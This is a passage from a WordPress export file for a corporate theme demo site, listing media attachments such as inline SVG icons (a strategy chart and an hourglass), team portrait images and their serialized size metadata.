		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/strategy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/strategy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M267.3,479.04H65.56c-2.311,0-4.19-1.879-4.19-4.19v-52.436h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.032h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.039-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37V19.19c0-2.311,1.879-4.19,4.19-4.19h52.74c4.142,0,7.5-3.358,7.5-7.5   S122.442,0,118.3,0H65.56C54.979,0,46.37,8.608,46.37,19.19v52.437h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.032h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v52.436c0,10.582,8.608,19.19,19.19,19.19H267.3c4.142,0,7.5-3.358,7.5-7.5   S271.442,479.04,267.3,479.04z M27.426,97.088c0-5.769,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003   s0.038-0.003,0.058-0.003h15.928c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887   C32.119,107.549,27.426,102.856,27.426,97.088z M27.426,197.043c0-5.769,4.693-10.461,10.461-10.461h31.969   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H53.957c-0.029,0-0.058-0.004-0.087-0.004   s-0.058,0.004-0.087,0.004H37.887C32.119,207.504,27.426,202.812,27.426,197.043z M27.426,296.998   c0-5.768,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003s0.038-0.003,0.058-0.003h15.928   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887C32.119,307.459,27.426,302.767,27.426,296.998z    M27.426,396.953c0-5.769,4.693-10.461,10.461-10.461h31.969c5.768,0,10.461,4.693,10.461,10.461   c0,5.768-4.693,10.461-10.461,10.461H53.948c-0.026,0-0.051-0.004-0.077-0.004s-0.051,0.004-0.077,0.004H37.887   C32.119,407.414,27.426,402.721,27.426,396.953z"></path>
	<path d="M148.295,15h202.564c20.029,0,36.325,16.295,36.325,36.325v133.679c0,4.142,3.358,7.5,7.5,7.5s7.5-3.358,7.5-7.5V51.325   C402.184,23.024,379.159,0,350.859,0H148.295c-4.142,0-7.5,3.358-7.5,7.5S144.153,15,148.295,15z"></path>
	<path d="M476.084,447.256v-4.661c0-8.921-5.646-16.549-13.551-19.499l-2.458-59.614c-0.171-4.139-3.655-7.359-7.803-7.185   c-4.139,0.171-7.355,3.664-7.185,7.803l2.701,65.501c0.166,4.019,3.472,7.191,7.494,7.191c3.199,0,5.802,2.603,5.802,5.802v4.627   H328.282v-4.627c0-3.199,2.603-5.802,5.803-5.802c4.022,0,7.328-3.172,7.494-7.191l5.259-127.533h95.691l1.292,31.323   c0.171,4.138,3.659,7.355,7.803,7.185c4.139-0.17,7.355-3.664,7.185-7.803l-1.266-30.705h16.948c3.875,0,7.113-2.953,7.468-6.812   l7.575-82.241c0.193-2.1-0.506-4.184-1.927-5.742c-1.421-1.558-3.432-2.446-5.541-2.446h-32.193c-4.142,0-7.5,3.358-7.5,7.5v18.054   h-13.973l-2.248-18.938c-0.448-3.774-3.647-6.616-7.448-6.616h-48.04c-3.8,0-7,2.842-7.448,6.616l-2.248,18.938h-13.972v-18.054   c0-4.142-3.358-7.5-7.5-7.5h-32.193c-2.109,0-4.12,0.888-5.541,2.446c-1.421,1.558-2.121,3.642-1.927,5.742l7.575,82.241   c0.355,3.859,3.593,6.812,7.468,6.812h16.948l-4.991,121.027c-7.906,2.95-13.552,10.578-13.552,19.499v4.661   c-13.066,0.672-23.489,11.512-23.489,24.742V504.5c0,4.142,3.358,7.5,7.5,7.5h194.781c4.142,0,7.5-3.358,7.5-7.5v-32.502   C499.574,458.768,489.15,447.927,476.084,447.256z M315.525,219.828h16.471v18.054c0,4.142,3.358,7.5,7.5,7.5h28.135   c3.8,0,7-2.842,7.448-6.616l2.248-18.938h34.714l2.248,18.938c0.448,3.774,3.647,6.616,7.448,6.616h28.135   c4.142,0,7.5-3.358,7.5-7.5v-18.054h16.47l-6.193,67.241h-17.922H339.641h-17.923L315.525,219.828z M484.574,497H304.793v-25.002   c0-5.39,4.385-9.775,9.775-9.775h6.214h147.802h6.214c5.39,0,9.775,4.385,9.775,9.775V497z"></path>
	<path d="M217.372,92.562c0-18.108-14.732-32.84-32.84-32.84c-18.108,0-32.84,14.732-32.84,32.84s14.732,32.84,32.84,32.84   C202.64,125.401,217.372,110.669,217.372,92.562z M166.691,92.562c0-9.837,8.003-17.84,17.84-17.84   c9.837,0,17.84,8.003,17.84,17.84s-8.003,17.84-17.84,17.84C174.694,110.401,166.691,102.398,166.691,92.562z"></path>
	<path d="M187.046,226.088c-4.03,0.958-6.52,5.002-5.562,9.032c1.208,5.078,2.677,10.156,4.368,15.095   c1.066,3.114,3.978,5.073,7.095,5.073c0.805,0,1.625-0.131,2.43-0.406c3.919-1.342,6.008-5.606,4.667-9.525   c-1.535-4.484-2.87-9.096-3.966-13.707C195.12,227.619,191.075,225.13,187.046,226.088z"></path>
	<path d="M184.532,181.222c-4.142,0-7.5,3.358-7.5,7.5v8.252c0,2.347,0.05,4.724,0.149,7.063c0.17,4.031,3.491,7.183,7.488,7.183   c0.107,0,0.215-0.002,0.323-0.007c4.138-0.175,7.351-3.672,7.176-7.811c-0.09-2.129-0.136-4.292-0.136-6.428v-8.252   C192.032,184.58,188.674,181.222,184.532,181.222z"></path>
	<path d="M285.918,335.648c-4.399-1.759-8.769-3.755-12.986-5.933c-3.682-1.9-8.206-0.456-10.105,3.224   c-1.9,3.681-0.457,8.205,3.224,10.105c4.643,2.396,9.453,4.594,14.297,6.531c0.913,0.365,1.855,0.538,2.782,0.538   c2.977,0,5.793-1.784,6.966-4.717C291.635,341.551,289.764,337.187,285.918,335.648z"></path>
	<path d="M219.523,283.323c-2.747-3.866-5.337-7.91-7.7-12.017c-2.066-3.59-6.649-4.826-10.241-2.761   c-3.59,2.066-4.826,6.651-2.761,10.241c2.601,4.52,5.451,8.968,8.473,13.223c1.463,2.059,3.774,3.157,6.121,3.157   c1.502,0,3.019-0.45,4.337-1.386C221.128,291.382,221.921,286.7,219.523,283.323z"></path>
	<path d="M239.667,326.047c1.376,1.085,3.013,1.611,4.639,1.611c2.218,0,4.414-0.98,5.894-2.856   c2.565-3.252,2.007-7.968-1.245-10.533c-3.723-2.936-7.35-6.087-10.778-9.365c-2.995-2.863-7.742-2.757-10.604,0.238   c-2.863,2.994-2.756,7.741,0.238,10.604C231.583,319.352,235.572,322.818,239.667,326.047z"></path>
	<path d="M224.3,192.801c2.769-3.081,2.515-7.823-0.565-10.592l-34.19-30.725c-0.041-0.037-0.085-0.068-0.127-0.104   c-0.087-0.075-0.177-0.148-0.268-0.219c-0.098-0.077-0.197-0.152-0.298-0.223c-0.091-0.064-0.184-0.126-0.278-0.187   c-0.107-0.068-0.214-0.134-0.324-0.197c-0.096-0.055-0.192-0.107-0.29-0.158c-0.113-0.058-0.226-0.112-0.341-0.164   c-0.101-0.046-0.202-0.09-0.304-0.131c-0.118-0.047-0.236-0.089-0.355-0.13c-0.104-0.036-0.208-0.071-0.315-0.102   c-0.126-0.037-0.253-0.068-0.381-0.098c-0.102-0.024-0.203-0.05-0.306-0.07c-0.15-0.029-0.3-0.049-0.451-0.069   c-0.084-0.011-0.167-0.026-0.251-0.034c-0.481-0.047-0.966-0.047-1.447,0c-0.083,0.008-0.163,0.022-0.245,0.033   c-0.153,0.02-0.306,0.041-0.458,0.07c-0.101,0.019-0.199,0.045-0.299,0.068c-0.13,0.031-0.26,0.062-0.389,0.1   c-0.104,0.03-0.205,0.065-0.307,0.1c-0.122,0.042-0.243,0.085-0.364,0.133c-0.1,0.04-0.199,0.083-0.297,0.127   c-0.118,0.053-0.234,0.109-0.349,0.168c-0.096,0.049-0.19,0.101-0.283,0.154c-0.112,0.064-0.221,0.131-0.33,0.201   c-0.092,0.059-0.183,0.12-0.273,0.183c-0.102,0.072-0.203,0.148-0.302,0.226c-0.09,0.071-0.179,0.143-0.266,0.217   c-0.042,0.036-0.086,0.067-0.128,0.104l-34.19,30.725c-3.081,2.769-3.334,7.511-0.565,10.592c1.481,1.648,3.527,2.487,5.581,2.487   c1.786,0,3.578-0.634,5.011-1.921l29.177-26.22l29.177,26.22C216.79,196.135,221.531,195.882,224.3,192.801z"></path>
	<path d="M213.736,370.946c-2.929-2.929-7.678-2.929-10.606,0l-18.598,18.598l-18.598-18.598c-2.929-2.929-7.678-2.929-10.606,0   c-2.929,2.929-2.929,7.678,0,10.606l18.598,18.598l-18.598,18.598c-2.929,2.929-2.929,7.678,0,10.606   c1.464,1.464,3.384,2.197,5.303,2.197s3.839-0.732,5.303-2.197l18.598-18.598l18.598,18.598c1.464,1.464,3.384,2.197,5.303,2.197   s3.839-0.732,5.303-2.197c2.929-2.929,2.929-7.678,0-10.606l-18.598-18.598l18.598-18.598   C216.665,378.624,216.665,373.875,213.736,370.946z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>hourglass</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/hourglass/</link>
		<pubDate>Wed, 11 Nov 2020 07:54:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/hourglass.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1872</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 07:54:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 07:54:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[hourglass]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/hourglass.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/hourglass.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image3-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/image3-home4/</link>
		<pubDate>Wed, 11 Nov 2020 08:46:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image3-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1879</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 08:46:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 08:46:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image3-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image3-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image3-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:710;s:6:"height";i:620;s:4:"file";s:24:"2020/11/image3-home4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image3-home4-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image3-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image3-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image3-home4-710x600.jpg";s:5:"width";i:710;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team1-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/team1-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:01:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team1-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1896</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:01:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:01:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team1-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team1-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team1-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team1-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team1-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team3-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/team3-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:01:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team3-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1897</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:01:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:01:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team3-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team3-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team3-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team3-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team3-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/team4-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:01:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1898</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:01:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:01:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team4-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team4-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team4-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team2-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/team2-circle/</link>
		<pubDate>Wed, 11 Nov 2020 10:05:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team2-circle.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1903</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:05:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:05:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team2-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team2-circle.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/team2-circle.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:195;s:6:"height";i:195;s:4:"file";s:24:"2020/11/team2-circle.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"team2-circle-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/bg2-home4/</link>
		<pubDate>Wed, 11 Nov 2020 10:07:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1910</wp:post_id>
		<wp:post_date><![CDATA[2020-11-11 10:07:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-11 10:07:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bg2-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
